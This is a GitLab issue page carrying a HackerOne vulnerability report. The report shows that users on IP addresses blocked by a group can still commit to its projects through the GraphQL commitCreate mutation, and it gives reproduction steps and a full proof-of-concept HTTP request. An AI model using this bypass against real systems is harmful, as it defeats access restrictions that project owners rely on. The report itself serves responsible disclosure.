Skip to content

Users on banned IP addresses can still commit to projects

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1914049 by js_noob on 2023-03-21, assigned to GitLab Team:

Report | Attachments | How To Reproduce

Report

Summary

Hello team, as a part of the grp/project security an owner can block certain IP addresses from accessing that group resources (projects,...). However, even if a user is on a blocked IP address he can still commit to projects.

Steps to reproduce
  1. Create a grp, project and add a maintainer
  2. From the owner navigate to https://gitlab.com/groups/YOUR_GRP/-/edit#js-permissions-settings and add the maintainer IP address under Restrict access by IP address
  3. From the maintainer navigate to https://gitlab.com/GRP/PROJECT/-/tree/main and verify the 404
  4. From the maintainer send the following request, but change the variables according to your preferences
POST /api/graphql HTTP/2  
Host: gitlab.com  
Cookie: YOUR_COOKIES  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://gitlab.com/-/graphql-explorer?_gl=1*1mb1g5a*_ga*MjM3Mzk5MDUzLjE2NzczMjcxMTY.*_ga_ENFH3X7M5Y*MTY3ODk4Mzg2Ni40LjEuMTY3ODk4MzkwNi4wLjAuMA..  
Content-Type: application/json  
X-Csrf-Token: xD3r11jgwirOfA6E1GB1pL9ZEuq8lqQCYcrZo4eSO8xbfvb9kmkI5BmsLqWWtgLw894u3hwjqXeGO4LbPJ_cNg  
Content-Length: 489  
Origin: https://gitlab.com  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Te: trailers

{"query":"mutation MyMutation {\n  commitCreate(\n    input: {\n      projectPath: \"test645811/project-1\",\n      branch: \"main\",\n      message: \"This is a Commit\",\n      actions: [\n        {\n          action: UPDATE,\n          filePath: \"README.md\",\n          content: \"This is a test content\",\n          encoding: TEXT\n        }\n      ]\n    }\n  ) {\n    commit {\n      author {\n        name\n      }\n    }\n  }\n}\n","variables":null,"operationName":"MyMutation"}  
  1. Verify the successful response and from the owner verify the creation of the commit
Video/POC

bandicam_2023-03-21_20-40-59-702.mp4

Impact

Users from banned IP addresses can manage push changes to project where they should be completely blocked from accessing any project that belongs to that group.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: